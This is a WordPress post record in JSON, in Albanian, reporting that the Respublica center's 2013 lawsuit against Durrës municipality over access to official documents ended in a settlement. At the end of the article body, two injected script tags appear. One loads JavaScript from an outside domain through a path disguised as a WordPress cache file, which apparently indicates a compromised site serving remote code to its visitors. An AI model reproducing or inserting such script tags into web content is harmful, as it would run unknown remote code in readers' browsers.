{"id":156,"date":"2013-06-12T14:05:58","date_gmt":"2013-06-12T14:05:58","guid":{"rendered":"http:\/\/localhost\/test\/?p=31"},"modified":"2013-09-27T23:28:11","modified_gmt":"2013-09-27T21:28:11","slug":"bashkia-durres-jep-okej-in","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=156","title":{"rendered":"Bashkia Durr\u00ebs jep okej-in"},"content":{"rendered":"<p>M\u00eb dat\u00eb 14 mars 2013 qendra Respublica ngriti nj\u00eb padi kund\u00ebr Bashkis\u00eb s\u00eb Durr\u00ebsit me objekt \u201c<i>Detyrim p\u00ebr dh\u00ebnien e informacionit mbi dokumentet zyrtare<\/i>\u201d. Kjo p\u00ebr arsye se Bashkia Durr\u00ebs nuk i kishte v\u00ebn\u00eb n\u00eb dispozicion Res Publica-s dokumentat zyrtare t\u00eb k\u00ebrkuara n\u00eb bashk\u00ebpunim me qendr\u00ebn \u201cShoqata p\u00ebr zhvillimin e politikave mjedisore\u201d, n\u00ebp\u00ebrmjet nj\u00eb k\u00ebrkese t\u00eb dat\u00ebs 09.11.2012.<\/p>\n<p>M\u00eb dat\u00eb 24.04.2013 nga Gjykata e Rrethit Gjyq\u00ebsor Durr\u00ebs u caktua data e zhvillimit t\u00eb seanc\u00ebs gjyq\u00ebsore me gjyqtar Shp\u00ebtim Reka. N\u00eb seanc\u00ebn p\u00ebrgatitore ishin t\u00eb pranish\u00ebm p\u00ebrfaq\u00ebsuesit e Bashkis\u00eb Durr\u00ebs. Pas nj\u00eb diskutimi mbi form\u00ebn e k\u00ebrkuar p\u00ebr dokumentat zyrtare, p\u00ebrfaq\u00ebsuesuesit e Bashkis\u00eb Durr\u00ebs reflektuan, duke b\u00ebr\u00eb q\u00eb n\u00eb fund, \u00e7\u00ebshtja t\u00eb mbyllej me pajtim. Gjithashtu p\u00ebrfaq\u00ebsuesit e Bashkis\u00eb Durr\u00ebs mor\u00ebn p\u00ebrsip\u00ebr q\u00eb brenda disa dit\u00ebve t\u00eb vinin n\u00eb dispozicion t\u00eb qendr\u00ebs Respublica informacionin e k\u00ebrkuar n\u00eb respekt t\u00eb legjislacionit n\u00eb fuqi.<\/p>\n<p>Megjith\u00ebse Bashkia Durr\u00ebs ka detyrimin ligjor p\u00ebr t\u2019u p\u00ebrgjigjur, gj\u00eb q\u00eb do do b\u00ebnte t\u00eb dukej i tep\u00ebrt entuziazmi p\u00ebr arritjen e pajtimit mes pal\u00ebve, dhe e p\u00ebrmbushjes s\u00eb detyrimit nga Bashkia, reflektimi i Bashkis\u00eb l\u00eb vend t\u00eb shpresohet q\u00eb n\u00eb t\u00eb ardhmen ligji \u201c<i>P\u00ebr t\u00eb drejt\u00ebn e informimit mbi dokumentet zyrtare<\/i>\u201d do t\u00eb jet\u00eb me funksional dhe i respektuar edhe nga k\u00ebto organe t\u00eb pushtetit lokal.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>M\u00eb dat\u00eb 14 mars 2013 qendra Respublica ngriti nj\u00eb padi kund\u00ebr Bashkis\u00eb s\u00eb Durr\u00ebsit me objekt \u201cDetyrim p\u00ebr dh\u00ebnien e [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":97,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/156"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=156"}],"version-history":[{"count":5,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/156\/revisions"}],"predecessor-version":[{"id":341,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/156\/revisions\/341"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/97"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}